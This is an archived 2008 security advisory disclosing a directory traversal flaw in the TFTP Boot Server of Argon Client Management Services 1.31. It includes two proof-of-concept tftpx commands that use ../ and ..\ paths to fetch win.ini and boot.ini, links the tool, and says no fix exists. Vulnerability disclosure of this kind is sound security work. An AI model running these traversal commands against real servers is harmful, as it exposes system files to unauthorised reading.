TUCoPS :: HP Unsorted A

TUCoPS :: HP Unsorted A :: bx2324.htm
Argon Client Management Services 1.31 directory traversal

Directory traversal in Argon Client Management Services 1.31 Directory traversal in Argon Client Management Services 1.31



#######################################################################

                             Luigi Auriemma

Application:  Argon Client Management Services
http://www.argontechnology.com/product.aspx/cid1/43 
Versions:     <= 1.31 (TFTP Boot Server <= 2.5.3.1)
Platforms:    Windows
Bug:          directory traversal in TFTP Boot Server
Exploitation: remote
Date:         08 Mar 2008
Author:       Luigi Auriemma
e-mail: aluigi@autistici.org 
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

==============1) Introduction
==============

>From vendor's website:
"Client Management Services=AE (CMS) includes all the server-based
services (PXE Server, BOOTP Server) and administration tools needed to
setup an open network boot environment. You can deploy your favorite
third party client management tools in a pre-OS booting phase."


#######################################################################

=====2) Bug
=====

The TFTP Boot Server is affected by a classical directory traversal
vulnerability which allows an attacker to download (upload is not
allowed) any file from the disk where is located the tftp folder.


#######################################################################

==========3) The Code
==========

http://aluigi.org/testz/tftpx.zip 

  tftpx SERVER ../../windows/win.ini none
  tftpx SERVER ..\boot.ini none


#######################################################################

=====4) Fix
=====

No fix


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org